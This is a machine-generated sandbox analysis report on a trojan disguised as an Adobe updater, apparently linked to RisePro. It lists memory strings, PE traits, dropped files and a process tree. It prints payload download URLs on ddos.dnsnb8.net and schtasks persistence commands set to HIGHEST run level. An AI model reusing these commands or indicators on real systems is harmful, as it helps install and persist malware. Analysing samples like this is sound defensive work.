Source: xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarU
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarUa
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcag$
Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarhg
Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
Source: xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarsC:
Source: xRp.exe, 00000001.00000002.1856041634.000000000091E000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1857202345.00000000022EA000.00000004.00000010.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.000000000087D000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar8
Source: xRp.exe, 00000001.00000002.1856041634.000000000087D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarC:
Source: xRp.exe, 00000001.00000002.1857202345.00000000022EA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarMp
Source: xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarcC:
Source: xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarq
Source: xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rars
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.raryY
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarXY$$m
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar)X
Source: xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarsC:
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar?Y
Source: xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC:
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWSASendWs2_32.dll
Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.000000000117D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4130977280.000000000122A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000C.00000002.4131081947.000000000111E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4131139448.0000000001138000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: RageMP131.exe, 0000000C.00000002.4131081947.000000000111E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORTF/
Source: MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORTFs
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_77af7215-3

System Summary

PE file contains section with special chars

Source: AdobeUpdaterV131.exe	Static PE information: section name:
Source: AdobeUpdaterV131.exe	Static PE information: section name: .idata
Source: AdobeUpdaterV131.exe	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name: .idata
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name: .idata
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: xRp.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_00622040	0_2_00622040
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_0068F980	0_2_0068F980
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_00703188	0_2_00703188
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_006FFA00	0_2_006FFA00
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_006222C0	0_2_006222C0
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_006F9AB0	0_2_006F9AB0
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_0062A290	0_2_0062A290
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_006A0BF0	0_2_006A0BF0
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_00639BC0	0_2_00639BC0
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_00708BCF	0_2_00708BCF
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_0071C4A1	0_2_0071C4A1
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_00633D50	0_2_00633D50
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_006AAE60	0_2_006AAE60
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_0062A6C0	0_2_0062A6C0
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_006A3ED0	0_2_006A3ED0
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 1_2_004E6076	1_2_004E6076
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 1_2_004E6D00	1_2_004E6D00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00AB2040	9_2_00AB2040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00B93188	9_2_00B93188
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00B1F980	9_2_00B1F980
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00B89AB0	9_2_00B89AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00ABA290	9_2_00ABA290
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00AB22C0	9_2_00AB22C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00B8FA00	9_2_00B8FA00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00B30BF0	9_2_00B30BF0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00AC9BC0	9_2_00AC9BC0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00B98BCF	9_2_00B98BCF
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00BAC4A1	9_2_00BAC4A1
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00AC3D50	9_2_00AC3D50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00B33ED0	9_2_00B33ED0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00ABA6C0	9_2_00ABA6C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00B3AE60	9_2_00B3AE60
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00AB2040	10_2_00AB2040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00B93188	10_2_00B93188
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00B1F980	10_2_00B1F980
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00B89AB0	10_2_00B89AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00ABA290	10_2_00ABA290
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00AB22C0	10_2_00AB22C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00B8FA00	10_2_00B8FA00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00B30BF0	10_2_00B30BF0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00AC9BC0	10_2_00AC9BC0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00B98BCF	10_2_00B98BCF
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00BAC4A1	10_2_00BAC4A1
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00AC3D50	10_2_00AC3D50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00B33ED0	10_2_00B33ED0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00ABA6C0	10_2_00ABA6C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00B3AE60	10_2_00B3AE60
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_005C2040	12_2_005C2040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_006A3188	12_2_006A3188
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_0062F980	12_2_0062F980
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_0069FA00	12_2_0069FA00
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_005C22C0	12_2_005C22C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_005CA290	12_2_005CA290
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_00699AB0	12_2_00699AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_00640BF0	12_2_00640BF0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_005D9BC0	12_2_005D9BC0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_006A8BCF	12_2_006A8BCF
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_006BC4A1	12_2_006BC4A1
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_005D3D50	12_2_005D3D50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_0064AE60	12_2_0064AE60
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_005CA6C0	12_2_005CA6C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_00643ED0	12_2_00643ED0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_005C2040	14_2_005C2040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_006A3188	14_2_006A3188
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_0062F980	14_2_0062F980
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_0069FA00	14_2_0069FA00
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_005C22C0	14_2_005C22C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_005CA290	14_2_005CA290
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_00699AB0	14_2_00699AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_00640BF0	14_2_00640BF0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_005D9BC0	14_2_005D9BC0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_006A8BCF	14_2_006A8BCF
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_006BC4A1	14_2_006BC4A1
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_005D3D50	14_2_005D3D50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_0064AE60	14_2_0064AE60
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_005CA6C0	14_2_005CA6C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_00643ED0	14_2_00643ED0
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 15_2_00E36076	15_2_00E36076
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 15_2_00E36D00	15_2_00E36D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\xRp.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: String function: 0069CBF0 appears 46 times
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: String function: 00B8CBF0 appears 46 times

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1776

Source: AdobeUpdaterV131.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: MPGPH131.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: RageMP131.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: MyProg.exe.1.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: AdobeUpdaterV131.exe, 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameheidisql.exe2 vs AdobeUpdaterV131.exe
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131681173.0000000001350000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameheidisql.exe2 vs AdobeUpdaterV131.exe
Source: AdobeUpdaterV131.exe	Binary or memory string: OriginalFilenameheidisql.exe2 vs AdobeUpdaterV131.exe

Source: AdobeUpdaterV131.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: xRp.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: xRp.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: xRp.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: AdobeUpdaterV131.exe	Static PE information: Section: ZLIB complexity 0.999878358004386
Source: MPGPH131.exe.0.dr	Static PE information: Section: ZLIB complexity 0.999878358004386
Source: RageMP131.exe.0.dr	Static PE information: Section: ZLIB complexity 0.999878358004386

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@27/29@1/2

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 1_2_004E119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,		1_2_004E119F
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 15_2_00E3119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,		15_2_00E3119F

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

File created: C:\Users\user\AppData\Local\RageMP131

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6568

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

File created: C:\Users\user\AppData\Local\Temp\xRp.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

Source: AdobeUpdaterV131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: MPGPH131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RageMP131.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

File read: C:\Users\user\Desktop\AdobeUpdaterV131.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\AdobeUpdaterV131.exe "C:\Users\user\Desktop\AdobeUpdaterV131.exe"
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Process created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exe
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1776
Source: unknown	Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown	Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exe
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Process created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exe	Jump to behavior
